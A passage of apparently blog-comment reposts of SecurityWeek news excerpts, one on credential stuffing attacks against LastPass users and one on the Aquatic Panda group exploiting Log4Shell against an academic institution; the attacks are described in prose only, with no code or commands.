https://www.securityweek.com/lastpass-automated-warnings-linked-%E2%80%98credential-stuffing%E2%80%99-attack
Users of the popular LastPass password manager are being targeted in so-called “credential stuffing” attacks that use email addresses and passwords obtained from third-party breaches.
That’s the official word from LastPass in response to public reports that some users received blocked access emails warnings that are normally sent to users who log in from different devices and locations.
Tomi Engdahl says:
Chinese Spies Exploit Log4Shell to Hack Major Academic Institution
https://www.securityweek.com/chinese-spies-exploit-log4shell-hack-major-academic-institution
China-linked cyberespionage group Aquatic Panda was recently observed exploiting the Log4Shell vulnerability to compromise a large academic institution, CrowdStrike’s Falcon OverWatch team reports.
Tracked as CVE 2021-44228 and also referred to as Log4Shell and LogJam, the security hole affects the Apache Log4j Java logging framework and has been exploited in targeted attacks since early December.
As part of a recent campaign, the OverWatch security researchers observed Aquatic Panda leveraging a modified version of the Log4j exploit for initial access, and then performing various post-exploitation operations, including reconnaissance and credential harvesting.
In their attempt to compromise the unnamed academic institution, the attackers targeted a VMware Horizon instance that employed the vulnerable Log4j library. The exploit used in this attack was initially published on GitHub on December 13.
The attackers performed connectivity checks via DNS lookups for a subdomain running on the VMware Horizon instance, under the Apache Tomcat service (other threat actors too have been observed using public DNS logging services to identify vulnerable servers).
Next, Aquatic Panda executed multiple Linux commands on a Windows host on which the Apache Tomcat service was running, including some aimed at deploying attacker tools hosted on remote infrastructure.